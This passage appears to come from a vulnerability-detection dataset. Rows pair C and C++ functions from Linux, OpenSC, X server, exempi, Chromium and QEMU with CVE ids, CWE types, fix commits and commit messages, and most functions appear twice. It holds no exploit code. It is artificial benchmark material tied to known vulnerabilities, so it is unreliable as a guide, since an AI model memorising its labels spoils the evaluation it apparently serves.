epos.offset -= sizeof(struct long_ad);
} else
offset = 0;
fibh->sbh = fibh->ebh = udf_tread(dir->i_sb, block);
if (!fibh->sbh) {
*err = -EIO;
goto out_err;
}
block = dinfo->i_location.logicalBlockNum;
}
while (f_pos < size) {
fi = udf_fileident_read(dir, &f_pos, fibh, cfi, &epos, &eloc,
&elen, &offset);
if (!fi) {
*err = -EIO;
goto out_err;
}
liu = le16_to_cpu(cfi->lengthOfImpUse);
lfi = cfi->lengthFileIdent;
if ((cfi->fileCharacteristics & FID_FILE_CHAR_DELETED) != 0) {
if (((sizeof(struct fileIdentDesc) +
liu + lfi + 3) & ~3) == nfidlen) {
cfi->descTag.tagSerialNum = cpu_to_le16(1);
cfi->fileVersionNum = cpu_to_le16(1);
cfi->fileCharacteristics = 0;
cfi->lengthFileIdent = namelen;
cfi->lengthOfImpUse = cpu_to_le16(0);
if (!udf_write_fi(dir, cfi, fi, fibh, NULL,
name))
goto out_ok;
else {
*err = -EIO;
goto out_err;
}
}
}
}
add:
f_pos += nfidlen;
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB &&
sb->s_blocksize - fibh->eoffset < nfidlen) {
brelse(epos.bh);
epos.bh = NULL;
fibh->soffset -= udf_ext0_offset(dir);
fibh->eoffset -= udf_ext0_offset(dir);
f_pos -= udf_ext0_offset(dir);
if (fibh->sbh != fibh->ebh)
brelse(fibh->ebh);
brelse(fibh->sbh);
fibh->sbh = fibh->ebh =
udf_expand_dir_adinicb(dir, &block, err);
if (!fibh->sbh)
goto out_err;
epos.block = dinfo->i_location;
epos.offset = udf_file_entry_alloc_offset(dir);
/* Load extent udf_expand_dir_adinicb() has created */
udf_current_aext(dir, &epos, &eloc, &elen, 1);
}
/* Entry fits into current block? */
if (sb->s_blocksize - fibh->eoffset >= nfidlen) {
fibh->soffset = fibh->eoffset;
fibh->eoffset += nfidlen;
if (fibh->sbh != fibh->ebh) {
brelse(fibh->sbh);
fibh->sbh = fibh->ebh;
}
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB) {
block = dinfo->i_location.logicalBlockNum;
fi = (struct fileIdentDesc *)
(dinfo->i_ext.i_data +
fibh->soffset -
udf_ext0_offset(dir) +
dinfo->i_lenEAttr);
} else {
block = eloc.logicalBlockNum +
((elen - 1) >>
dir->i_sb->s_blocksize_bits);
fi = (struct fileIdentDesc *)
(fibh->sbh->b_data + fibh->soffset);
}
} else {
/* Round up last extent in the file */
elen = (elen + sb->s_blocksize - 1) & ~(sb->s_blocksize - 1);
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
epos.offset -= sizeof(struct short_ad);
else if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_LONG)
epos.offset -= sizeof(struct long_ad);
udf_write_aext(dir, &epos, &eloc, elen, 1);
dinfo->i_lenExtents = (dinfo->i_lenExtents + sb->s_blocksize
- 1) & ~(sb->s_blocksize - 1);
fibh->soffset = fibh->eoffset - sb->s_blocksize;
fibh->eoffset += nfidlen - sb->s_blocksize;
if (fibh->sbh != fibh->ebh) {
brelse(fibh->sbh);
fibh->sbh = fibh->ebh;
}
block = eloc.logicalBlockNum + ((elen - 1) >>
dir->i_sb->s_blocksize_bits);
fibh->ebh = udf_bread(dir,
f_pos >> dir->i_sb->s_blocksize_bits, 1, err);
if (!fibh->ebh)
goto out_err;
/* Extents could have been merged, invalidate our position */
brelse(epos.bh);
epos.bh = NULL;
epos.block = dinfo->i_location;
epos.offset = udf_file_entry_alloc_offset(dir);
if (!fibh->soffset) {
/* Find the freshly allocated block */
while (udf_next_aext(dir, &epos, &eloc, &elen, 1) ==
(EXT_RECORDED_ALLOCATED >> 30))
;
block = eloc.logicalBlockNum + ((elen - 1) >>
dir->i_sb->s_blocksize_bits);
brelse(fibh->sbh);
fibh->sbh = fibh->ebh;
fi = (struct fileIdentDesc *)(fibh->sbh->b_data);
} else {
fi = (struct fileIdentDesc *)
(fibh->sbh->b_data + sb->s_blocksize +
fibh->soffset);
}
}
memset(cfi, 0, sizeof(struct fileIdentDesc));
if (UDF_SB(sb)->s_udfrev >= 0x0200)
udf_new_tag((char *)cfi, TAG_IDENT_FID, 3, 1, block,
sizeof(struct tag));
else
udf_new_tag((char *)cfi, TAG_IDENT_FID, 2, 1, block,
sizeof(struct tag));
cfi->fileVersionNum = cpu_to_le16(1);
cfi->lengthFileIdent = namelen;
cfi->lengthOfImpUse = cpu_to_le16(0);
if (!udf_write_fi(dir, cfi, fi, fibh, NULL, name)) {
dir->i_size += nfidlen;
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB)
dinfo->i_lenAlloc += nfidlen;
else {
/* Find the last extent and truncate it to proper size */
while (udf_next_aext(dir, &epos, &eloc, &elen, 1) ==
(EXT_RECORDED_ALLOCATED >> 30))
;
elen -= dinfo->i_lenExtents - dir->i_size;
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
epos.offset -= sizeof(struct short_ad);
else if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_LONG)
epos.offset -= sizeof(struct long_ad);
udf_write_aext(dir, &epos, &eloc, elen, 1);
dinfo->i_lenExtents = dir->i_size;
}
mark_inode_dirty(dir);
goto out_ok;
} else {
*err = -EIO;
goto out_err;
}
out_err:
fi = NULL;
if (fibh->sbh != fibh->ebh)
brelse(fibh->ebh);
brelse(fibh->sbh);
out_ok:
brelse(epos.bh);
kfree(name);
return fi;
}
| static struct fileIdentDesc *udf_add_entry(struct inode *dir,
struct dentry *dentry,
struct udf_fileident_bh *fibh,
struct fileIdentDesc *cfi, int *err)
{
struct super_block *sb = dir->i_sb;
struct fileIdentDesc *fi = NULL;
unsigned char *name = NULL;
int namelen;
loff_t f_pos;
loff_t size = udf_ext0_offset(dir) + dir->i_size;
int nfidlen;
uint8_t lfi;
uint16_t liu;
int block;
struct kernel_lb_addr eloc;
uint32_t elen = 0;
sector_t offset;
struct extent_position epos = {};
struct udf_inode_info *dinfo;
fibh->sbh = fibh->ebh = NULL;
name = kmalloc(UDF_NAME_LEN, GFP_NOFS);
if (!name) {
*err = -ENOMEM;
goto out_err;
}
if (dentry) {
if (!dentry->d_name.len) {
*err = -EINVAL;
goto out_err;
}
namelen = udf_put_filename(sb, dentry->d_name.name, name,
dentry->d_name.len);
if (!namelen) {
*err = -ENAMETOOLONG;
goto out_err;
}
} else {
namelen = 0;
}
nfidlen = (sizeof(struct fileIdentDesc) + namelen + 3) & ~3;
f_pos = udf_ext0_offset(dir);
fibh->soffset = fibh->eoffset = f_pos & (dir->i_sb->s_blocksize - 1);
dinfo = UDF_I(dir);
if (dinfo->i_alloc_type != ICBTAG_FLAG_AD_IN_ICB) {
if (inode_bmap(dir, f_pos >> dir->i_sb->s_blocksize_bits, &epos,
&eloc, &elen, &offset) != (EXT_RECORDED_ALLOCATED >> 30)) {
block = udf_get_lb_pblock(dir->i_sb,
&dinfo->i_location, 0);
fibh->soffset = fibh->eoffset = sb->s_blocksize;
goto add;
}
block = udf_get_lb_pblock(dir->i_sb, &eloc, offset);
if ((++offset << dir->i_sb->s_blocksize_bits) < elen) {
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
epos.offset -= sizeof(struct short_ad);
else if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_LONG)
epos.offset -= sizeof(struct long_ad);
} else
offset = 0;
fibh->sbh = fibh->ebh = udf_tread(dir->i_sb, block);
if (!fibh->sbh) {
*err = -EIO;
goto out_err;
}
block = dinfo->i_location.logicalBlockNum;
}
while (f_pos < size) {
fi = udf_fileident_read(dir, &f_pos, fibh, cfi, &epos, &eloc,
&elen, &offset);
if (!fi) {
*err = -EIO;
goto out_err;
}
liu = le16_to_cpu(cfi->lengthOfImpUse);
lfi = cfi->lengthFileIdent;
if ((cfi->fileCharacteristics & FID_FILE_CHAR_DELETED) != 0) {
if (((sizeof(struct fileIdentDesc) +
liu + lfi + 3) & ~3) == nfidlen) {
cfi->descTag.tagSerialNum = cpu_to_le16(1);
cfi->fileVersionNum = cpu_to_le16(1);
cfi->fileCharacteristics = 0;
cfi->lengthFileIdent = namelen;
cfi->lengthOfImpUse = cpu_to_le16(0);
if (!udf_write_fi(dir, cfi, fi, fibh, NULL,
name))
goto out_ok;
else {
*err = -EIO;
goto out_err;
}
}
}
}
add:
f_pos += nfidlen;
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB &&
sb->s_blocksize - fibh->eoffset < nfidlen) {
brelse(epos.bh);
epos.bh = NULL;
fibh->soffset -= udf_ext0_offset(dir);
fibh->eoffset -= udf_ext0_offset(dir);
f_pos -= udf_ext0_offset(dir);
if (fibh->sbh != fibh->ebh)
brelse(fibh->ebh);
brelse(fibh->sbh);
fibh->sbh = fibh->ebh =
udf_expand_dir_adinicb(dir, &block, err);
if (!fibh->sbh)
goto out_err;
epos.block = dinfo->i_location;
epos.offset = udf_file_entry_alloc_offset(dir);
/* Load extent udf_expand_dir_adinicb() has created */
udf_current_aext(dir, &epos, &eloc, &elen, 1);
}
/* Entry fits into current block? */
if (sb->s_blocksize - fibh->eoffset >= nfidlen) {
fibh->soffset = fibh->eoffset;
fibh->eoffset += nfidlen;
if (fibh->sbh != fibh->ebh) {
brelse(fibh->sbh);
fibh->sbh = fibh->ebh;
}
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB) {
block = dinfo->i_location.logicalBlockNum;
fi = (struct fileIdentDesc *)
(dinfo->i_ext.i_data +
fibh->soffset -
udf_ext0_offset(dir) +
dinfo->i_lenEAttr);
} else {
block = eloc.logicalBlockNum +
((elen - 1) >>
dir->i_sb->s_blocksize_bits);
fi = (struct fileIdentDesc *)
(fibh->sbh->b_data + fibh->soffset);
}
} else {
/* Round up last extent in the file */
elen = (elen + sb->s_blocksize - 1) & ~(sb->s_blocksize - 1);
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
epos.offset -= sizeof(struct short_ad);
else if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_LONG)
epos.offset -= sizeof(struct long_ad);
udf_write_aext(dir, &epos, &eloc, elen, 1);
dinfo->i_lenExtents = (dinfo->i_lenExtents + sb->s_blocksize
- 1) & ~(sb->s_blocksize - 1);
fibh->soffset = fibh->eoffset - sb->s_blocksize;
fibh->eoffset += nfidlen - sb->s_blocksize;
if (fibh->sbh != fibh->ebh) {
brelse(fibh->sbh);
fibh->sbh = fibh->ebh;
}
block = eloc.logicalBlockNum + ((elen - 1) >>
dir->i_sb->s_blocksize_bits);
fibh->ebh = udf_bread(dir,
f_pos >> dir->i_sb->s_blocksize_bits, 1, err);
if (!fibh->ebh)
goto out_err;
/* Extents could have been merged, invalidate our position */
brelse(epos.bh);
epos.bh = NULL;
epos.block = dinfo->i_location;
epos.offset = udf_file_entry_alloc_offset(dir);
if (!fibh->soffset) {
/* Find the freshly allocated block */
while (udf_next_aext(dir, &epos, &eloc, &elen, 1) ==
(EXT_RECORDED_ALLOCATED >> 30))
;
block = eloc.logicalBlockNum + ((elen - 1) >>
dir->i_sb->s_blocksize_bits);
brelse(fibh->sbh);
fibh->sbh = fibh->ebh;
fi = (struct fileIdentDesc *)(fibh->sbh->b_data);
} else {
fi = (struct fileIdentDesc *)
(fibh->sbh->b_data + sb->s_blocksize +
fibh->soffset);
}
}
memset(cfi, 0, sizeof(struct fileIdentDesc));
if (UDF_SB(sb)->s_udfrev >= 0x0200)
udf_new_tag((char *)cfi, TAG_IDENT_FID, 3, 1, block,
sizeof(struct tag));
else
udf_new_tag((char *)cfi, TAG_IDENT_FID, 2, 1, block,
sizeof(struct tag));
cfi->fileVersionNum = cpu_to_le16(1);
cfi->lengthFileIdent = namelen;
cfi->lengthOfImpUse = cpu_to_le16(0);
if (!udf_write_fi(dir, cfi, fi, fibh, NULL, name)) {
dir->i_size += nfidlen;
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB)
dinfo->i_lenAlloc += nfidlen;
else {
/* Find the last extent and truncate it to proper size */
while (udf_next_aext(dir, &epos, &eloc, &elen, 1) ==
(EXT_RECORDED_ALLOCATED >> 30))
;
elen -= dinfo->i_lenExtents - dir->i_size;
if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
epos.offset -= sizeof(struct short_ad);
else if (dinfo->i_alloc_type == ICBTAG_FLAG_AD_LONG)
epos.offset -= sizeof(struct long_ad);
udf_write_aext(dir, &epos, &eloc, elen, 1);
dinfo->i_lenExtents = dir->i_size;
}
mark_inode_dirty(dir);
goto out_ok;
} else {
*err = -EIO;
goto out_err;
}
out_err:
fi = NULL;
if (fibh->sbh != fibh->ebh)
brelse(fibh->ebh);
brelse(fibh->sbh);
out_ok:
brelse(epos.bh);
kfree(name);
return fi;
}
| C | linux | 0 |
CVE-2018-16425 | https://www.cvedetails.com/cve/CVE-2018-16425/ | CWE-415 | https://github.com/OpenSC/OpenSC/commit/360e95d45ac4123255a4c796db96337f332160ad#diff-d643a0fa169471dbf2912f4866dc49c5 | 360e95d45ac4123255a4c796db96337f332160ad#diff-d643a0fa169471dbf2912f4866dc49c5 | fixed out of bounds writes
Thanks to Eric Sesterhenn from X41 D-SEC GmbH
for reporting the problems. | static int muscle_delete_mscfs_file(sc_card_t *card, mscfs_file_t *file_data)
{
mscfs_t *fs = MUSCLE_FS(card);
msc_id id = file_data->objectId;
u8* oid = id.id;
int r;
if(!file_data->ef) {
int x;
mscfs_file_t *childFile;
/* Delete children */
mscfs_check_cache(fs);
sc_debug(card->ctx, SC_LOG_DEBUG_NORMAL,
"DELETING Children of: %02X%02X%02X%02X\n",
oid[0],oid[1],oid[2],oid[3]);
for(x = 0; x < fs->cache.size; x++) {
msc_id objectId;
childFile = &fs->cache.array[x];
objectId = childFile->objectId;
if(0 == memcmp(oid + 2, objectId.id, 2)) {
sc_debug(card->ctx, SC_LOG_DEBUG_NORMAL,
"DELETING: %02X%02X%02X%02X\n",
objectId.id[0],objectId.id[1],
objectId.id[2],objectId.id[3]);
r = muscle_delete_mscfs_file(card, childFile);
if(r < 0) SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE,r);
}
}
oid[0] = oid[2];
oid[1] = oid[3];
oid[2] = oid[3] = 0;
/* ??? objectId = objectId >> 16; */
}
if((0 == memcmp(oid, "\x3F\x00\x00\x00", 4))
|| (0 == memcmp(oid, "\x3F\x00\x3F\x00", 4))) {
}
r = msc_delete_object(card, id, 1);
/* Check if its the root... this file generally is virtual
* So don't return an error if it fails */
if((0 == memcmp(oid, "\x3F\x00\x00\x00", 4))
|| (0 == memcmp(oid, "\x3F\x00\x3F\x00", 4)))
return 0;
if(r < 0) {
printf("ID: %02X%02X%02X%02X\n",
oid[0],oid[1],oid[2],oid[3]);
SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE,r);
}
return 0;
}
| static int muscle_delete_mscfs_file(sc_card_t *card, mscfs_file_t *file_data)
{
mscfs_t *fs = MUSCLE_FS(card);
msc_id id = file_data->objectId;
u8* oid = id.id;
int r;
if(!file_data->ef) {
int x;
mscfs_file_t *childFile;
/* Delete children */
mscfs_check_cache(fs);
sc_debug(card->ctx, SC_LOG_DEBUG_NORMAL,
"DELETING Children of: %02X%02X%02X%02X\n",
oid[0],oid[1],oid[2],oid[3]);
for(x = 0; x < fs->cache.size; x++) {
msc_id objectId;
childFile = &fs->cache.array[x];
objectId = childFile->objectId;
if(0 == memcmp(oid + 2, objectId.id, 2)) {
sc_debug(card->ctx, SC_LOG_DEBUG_NORMAL,
"DELETING: %02X%02X%02X%02X\n",
objectId.id[0],objectId.id[1],
objectId.id[2],objectId.id[3]);
r = muscle_delete_mscfs_file(card, childFile);
if(r < 0) SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE,r);
}
}
oid[0] = oid[2];
oid[1] = oid[3];
oid[2] = oid[3] = 0;
/* ??? objectId = objectId >> 16; */
}
if((0 == memcmp(oid, "\x3F\x00\x00\x00", 4))
|| (0 == memcmp(oid, "\x3F\x00\x3F\x00", 4))) {
}
r = msc_delete_object(card, id, 1);
/* Check if its the root... this file generally is virtual
* So don't return an error if it fails */
if((0 == memcmp(oid, "\x3F\x00\x00\x00", 4))
|| (0 == memcmp(oid, "\x3F\x00\x3F\x00", 4)))
return 0;
if(r < 0) {
printf("ID: %02X%02X%02X%02X\n",
oid[0],oid[1],oid[2],oid[3]);
SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE,r);
}
return 0;
}
| C | OpenSC | 0 |
CVE-2017-10971 | https://www.cvedetails.com/cve/CVE-2017-10971/ | CWE-119 | https://cgit.freedesktop.org/xorg/xserver/commit/?id=215f894965df5fb0bb45b107d84524e700d2073c | 215f894965df5fb0bb45b107d84524e700d2073c | null | void FreeSprite(DeviceIntPtr dev)
{
if (DevHasCursor(dev) && dev->spriteInfo->sprite) {
if (dev->spriteInfo->sprite->current)
FreeCursor(dev->spriteInfo->sprite->current, None);
free(dev->spriteInfo->sprite->spriteTrace);
free(dev->spriteInfo->sprite);
}
dev->spriteInfo->sprite = NULL;
}
| void FreeSprite(DeviceIntPtr dev)
{
if (DevHasCursor(dev) && dev->spriteInfo->sprite) {
if (dev->spriteInfo->sprite->current)
FreeCursor(dev->spriteInfo->sprite->current, None);
free(dev->spriteInfo->sprite->spriteTrace);
free(dev->spriteInfo->sprite);
}
dev->spriteInfo->sprite = NULL;
}
| C | xserver | 0 |
CVE-2018-7728 | https://www.cvedetails.com/cve/CVE-2018-7728/ | CWE-125 | https://cgit.freedesktop.org/exempi/commit/?id=e163667a06a9b656a047b0ec660b871f29a83c9f | e163667a06a9b656a047b0ec660b871f29a83c9f | null | void TIFF_MetaHandler::UpdateFile ( bool doSafeUpdate )
{
XMP_Assert ( ! doSafeUpdate ); // This should only be called for "unsafe" updates.
XMP_IO* destRef = this->parent->ioRef;
XMP_AbortProc abortProc = this->parent->abortProc;
void * abortArg = this->parent->abortArg;
XMP_Int64 oldPacketOffset = this->packetInfo.offset;
XMP_Int32 oldPacketLength = this->packetInfo.length;
if ( oldPacketOffset == kXMPFiles_UnknownOffset ) oldPacketOffset = 0; // ! Simplify checks.
if ( oldPacketLength == kXMPFiles_UnknownLength ) oldPacketLength = 0;
bool fileHadXMP = ((oldPacketOffset != 0) && (oldPacketLength != 0));
ExportPhotoData ( kXMP_TIFFFile, &this->xmpObj, &this->tiffMgr, this->iptcMgr, this->psirMgr );
try {
XMP_OptionBits options = kXMP_UseCompactFormat;
if ( fileHadXMP ) options |= kXMP_ExactPacketLength;
this->xmpObj.SerializeToBuffer ( &this->xmpPacket, options, oldPacketLength );
} catch ( ... ) {
this->xmpObj.SerializeToBuffer ( &this->xmpPacket, kXMP_UseCompactFormat );
}
bool doInPlace = (fileHadXMP && (this->xmpPacket.size() <= (size_t)oldPacketLength));
if ( this->tiffMgr.IsLegacyChanged() ) doInPlace = false;
bool localProgressTracking = false;
XMP_ProgressTracker* progressTracker = this->parent->progressTracker;
if ( ! doInPlace ) {
#if GatherPerformanceData
sAPIPerf->back().extraInfo += ", TIFF append update";
#endif
if ( (progressTracker != 0) && (! progressTracker->WorkInProgress()) ) {
localProgressTracking = true;
progressTracker->BeginWork();
}
this->tiffMgr.SetTag ( kTIFF_PrimaryIFD, kTIFF_XMP, kTIFF_UndefinedType, (XMP_Uns32)this->xmpPacket.size(), this->xmpPacket.c_str() );
this->tiffMgr.UpdateFileStream ( destRef, progressTracker );
} else {
#if GatherPerformanceData
sAPIPerf->back().extraInfo += ", TIFF in-place update";
#endif
if ( this->xmpPacket.size() < (size_t)this->packetInfo.length ) {
size_t extraSpace = (size_t)this->packetInfo.length - this->xmpPacket.size();
this->xmpPacket.append ( extraSpace, ' ' );
}
XMP_IO* liveFile = this->parent->ioRef;
XMP_Assert ( this->xmpPacket.size() == (size_t)oldPacketLength ); // ! Done by common PutXMP logic.
if ( progressTracker != 0 ) {
if ( progressTracker->WorkInProgress() ) {
progressTracker->AddTotalWork ( this->xmpPacket.size() );
} else {
localProgressTracking = true;
progressTracker->BeginWork ( this->xmpPacket.size() );
}
}
liveFile->Seek ( oldPacketOffset, kXMP_SeekFromStart );
liveFile->Write ( this->xmpPacket.c_str(), (XMP_Int32)this->xmpPacket.size() );
}
if ( localProgressTracking ) progressTracker->WorkComplete();
this->needsUpdate = false;
} // TIFF_MetaHandler::UpdateFile
| void TIFF_MetaHandler::UpdateFile ( bool doSafeUpdate )
{
XMP_Assert ( ! doSafeUpdate ); // This should only be called for "unsafe" updates.
XMP_IO* destRef = this->parent->ioRef;
XMP_AbortProc abortProc = this->parent->abortProc;
void * abortArg = this->parent->abortArg;
XMP_Int64 oldPacketOffset = this->packetInfo.offset;
XMP_Int32 oldPacketLength = this->packetInfo.length;
if ( oldPacketOffset == kXMPFiles_UnknownOffset ) oldPacketOffset = 0; // ! Simplify checks.
if ( oldPacketLength == kXMPFiles_UnknownLength ) oldPacketLength = 0;
bool fileHadXMP = ((oldPacketOffset != 0) && (oldPacketLength != 0));
ExportPhotoData ( kXMP_TIFFFile, &this->xmpObj, &this->tiffMgr, this->iptcMgr, this->psirMgr );
try {
XMP_OptionBits options = kXMP_UseCompactFormat;
if ( fileHadXMP ) options |= kXMP_ExactPacketLength;
this->xmpObj.SerializeToBuffer ( &this->xmpPacket, options, oldPacketLength );
} catch ( ... ) {
this->xmpObj.SerializeToBuffer ( &this->xmpPacket, kXMP_UseCompactFormat );
}
bool doInPlace = (fileHadXMP && (this->xmpPacket.size() <= (size_t)oldPacketLength));
if ( this->tiffMgr.IsLegacyChanged() ) doInPlace = false;
bool localProgressTracking = false;
XMP_ProgressTracker* progressTracker = this->parent->progressTracker;
if ( ! doInPlace ) {
#if GatherPerformanceData
sAPIPerf->back().extraInfo += ", TIFF append update";
#endif
if ( (progressTracker != 0) && (! progressTracker->WorkInProgress()) ) {
localProgressTracking = true;
progressTracker->BeginWork();
}
this->tiffMgr.SetTag ( kTIFF_PrimaryIFD, kTIFF_XMP, kTIFF_UndefinedType, (XMP_Uns32)this->xmpPacket.size(), this->xmpPacket.c_str() );
this->tiffMgr.UpdateFileStream ( destRef, progressTracker );
} else {
#if GatherPerformanceData
sAPIPerf->back().extraInfo += ", TIFF in-place update";
#endif
if ( this->xmpPacket.size() < (size_t)this->packetInfo.length ) {
size_t extraSpace = (size_t)this->packetInfo.length - this->xmpPacket.size();
this->xmpPacket.append ( extraSpace, ' ' );
}
XMP_IO* liveFile = this->parent->ioRef;
XMP_Assert ( this->xmpPacket.size() == (size_t)oldPacketLength ); // ! Done by common PutXMP logic.
if ( progressTracker != 0 ) {
if ( progressTracker->WorkInProgress() ) {
progressTracker->AddTotalWork ( this->xmpPacket.size() );
} else {
localProgressTracking = true;
progressTracker->BeginWork ( this->xmpPacket.size() );
}
}
liveFile->Seek ( oldPacketOffset, kXMP_SeekFromStart );
liveFile->Write ( this->xmpPacket.c_str(), (XMP_Int32)this->xmpPacket.size() );
}
if ( localProgressTracking ) progressTracker->WorkComplete();
this->needsUpdate = false;
} // TIFF_MetaHandler::UpdateFile
| CPP | exempi | 0 |
null | null | null | https://github.com/chromium/chromium/commit/a0af50481db56aa780942e8595a20c36b2c34f5c | a0af50481db56aa780942e8595a20c36b2c34f5c | Build fix following bug #30696.
Patch by Gavin Barraclough <barraclough@apple.com> on 2009-10-22
Reviewed by NOBODY (build fix).
* WebCoreSupport/FrameLoaderClientGtk.cpp:
(WebKit::FrameLoaderClient::windowObjectCleared):
* webkit/webkitwebframe.cpp:
(webkit_web_frame_get_global_context):
git-svn-id: svn://svn.chromium.org/blink/trunk@49964 bbb929c8-8fbe-4397-9dbb-9b2b20218538 | void FrameLoaderClient::dispatchWillPerformClientRedirect(const KURL&, double, double)
{
notImplemented();
}
| void FrameLoaderClient::dispatchWillPerformClientRedirect(const KURL&, double, double)
{
notImplemented();
}
| C | Chrome | 0 |
CVE-2011-2830 | https://www.cvedetails.com/cve/CVE-2011-2830/ | CWE-399 | https://github.com/chromium/chromium/commit/08b630e66e042af3fe80015509b3238c2679ea40 | 08b630e66e042af3fe80015509b3238c2679ea40 | PopupMenuClient::multiple() should be const
https://bugs.webkit.org/show_bug.cgi?id=76771
Patch by Benjamin Poulain <bpoulain@apple.com> on 2012-01-21
Reviewed by Kent Tamura.
* platform/PopupMenuClient.h:
(WebCore::PopupMenuClient::multiple):
* rendering/RenderMenuList.cpp:
(WebCore::RenderMenuList::multiple):
* rendering/RenderMenuList.h:
git-svn-id: svn://svn.chromium.org/blink/trunk@105570 bbb929c8-8fbe-4397-9dbb-9b2b20218538 | void RenderMenuList::didSetSelectedIndex(int listIndex)
{
didUpdateActiveOption(toHTMLSelectElement(node())->listToOptionIndex(listIndex));
}
| void RenderMenuList::didSetSelectedIndex(int listIndex)
{
didUpdateActiveOption(toHTMLSelectElement(node())->listToOptionIndex(listIndex));
}
| C | Chrome | 0 |
CVE-2017-6001 | https://www.cvedetails.com/cve/CVE-2017-6001/ | CWE-362 | https://github.com/torvalds/linux/commit/321027c1fe77f892f4ea07846aeae08cefbbb290 | 321027c1fe77f892f4ea07846aeae08cefbbb290 | perf/core: Fix concurrent sys_perf_event_open() vs. 'move_group' race
Di Shen reported a race between two concurrent sys_perf_event_open()
calls where both try and move the same pre-existing software group
into a hardware context.
The problem is exactly that described in commit:
f63a8daa5812 ("perf: Fix event->ctx locking")
... where, while we wait for a ctx->mutex acquisition, the event->ctx
relation can have changed under us.
That very same commit failed to recognise sys_perf_event_context() as an
external access vector to the events and thereby didn't apply the
established locking rules correctly.
So while one sys_perf_event_open() call is stuck waiting on
mutex_lock_double(), the other (which owns said locks) moves the group
about. So by the time the former sys_perf_event_open() acquires the
locks, the context we've acquired is stale (and possibly dead).
Apply the established locking rules as per perf_event_ctx_lock_nested()
to the mutex_lock_double() for the 'move_group' case. This obviously means
we need to validate state after we acquire the locks.
Reported-by: Di Shen (Keen Lab)
Tested-by: John Dias <joaodias@google.com>
Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Cc: Alexander Shishkin <alexander.shishkin@linux.intel.com>
Cc: Arnaldo Carvalho de Melo <acme@kernel.org>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
Cc: Jiri Olsa <jolsa@redhat.com>
Cc: Kees Cook <keescook@chromium.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Min Chong <mchong@google.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Stephane Eranian <eranian@google.com>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: Vince Weaver <vincent.weaver@maine.edu>
Fixes: f63a8daa5812 ("perf: Fix event->ctx locking")
Link: http://lkml.kernel.org/r/20170106131444.GZ3174@twins.programming.kicks-ass.net
Signed-off-by: Ingo Molnar <mingo@kernel.org> | static void perf_event_context_sched_in(struct perf_event_context *ctx,
struct task_struct *task)
{
struct perf_cpu_context *cpuctx;
cpuctx = __get_cpu_context(ctx);
if (cpuctx->task_ctx == ctx)
return;
perf_ctx_lock(cpuctx, ctx);
perf_pmu_disable(ctx->pmu);
/*
* We want to keep the following priority order:
* cpu pinned (that don't need to move), task pinned,
* cpu flexible, task flexible.
*/
cpu_ctx_sched_out(cpuctx, EVENT_FLEXIBLE);
perf_event_sched_in(cpuctx, ctx, task);
perf_pmu_enable(ctx->pmu);
perf_ctx_unlock(cpuctx, ctx);
}
| static void perf_event_context_sched_in(struct perf_event_context *ctx,
struct task_struct *task)
{
struct perf_cpu_context *cpuctx;
cpuctx = __get_cpu_context(ctx);
if (cpuctx->task_ctx == ctx)
return;
perf_ctx_lock(cpuctx, ctx);
perf_pmu_disable(ctx->pmu);
/*
* We want to keep the following priority order:
* cpu pinned (that don't need to move), task pinned,
* cpu flexible, task flexible.
*/
cpu_ctx_sched_out(cpuctx, EVENT_FLEXIBLE);
perf_event_sched_in(cpuctx, ctx, task);
perf_pmu_enable(ctx->pmu);
perf_ctx_unlock(cpuctx, ctx);
}
| C | linux | 0 |
CVE-2016-5194 | null | null | https://github.com/chromium/chromium/commit/d4e0a7273cd8d7a9ee667ad5b5c8aad0f5f59251 | d4e0a7273cd8d7a9ee667ad5b5c8aad0f5f59251 | Clear Shill stub config in offline file manager tests
The Shill stub client fakes ethernet and wifi connections during
testing. Clear its config during offline tests to simulate a lack of
network connectivity.
As a side effect, fileManagerPrivate.getDriveConnectionState will no
longer need to be stubbed out, as it will now think the device is
offline and return the appropriate result.
Bug: 925272
Change-Id: Idd6cb44325cfde4991d3b1e64185a28e8655c733
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1578149
Commit-Queue: Austin Tankiang <austinct@chromium.org>
Reviewed-by: Sam McNally <sammc@chromium.org>
Cr-Commit-Position: refs/heads/master@{#654782} | void CreateTeamDrive(const std::string& name,
google_apis::TeamDriveCapabilities capabilities) {
fake_drive_service_->AddTeamDrive(name, name);
fake_drive_service_->SetTeamDriveCapabilities(name, capabilities);
}
| void CreateTeamDrive(const std::string& name,
google_apis::TeamDriveCapabilities capabilities) {
fake_drive_service_->AddTeamDrive(name, name);
fake_drive_service_->SetTeamDriveCapabilities(name, capabilities);
}
| C | Chrome | 0 |
CVE-2014-7815 | https://www.cvedetails.com/cve/CVE-2014-7815/ | CWE-264 | https://git.qemu.org/?p=qemu.git;a=commit;h=e6908bfe8e07f2b452e78e677da1b45b1c0f6829 | e6908bfe8e07f2b452e78e677da1b45b1c0f6829 | null | void buffer_reserve(Buffer *buffer, size_t len)
{
if ((buffer->capacity - buffer->offset) < len) {
buffer->capacity += (len + 1024);
buffer->buffer = g_realloc(buffer->buffer, buffer->capacity);
if (buffer->buffer == NULL) {
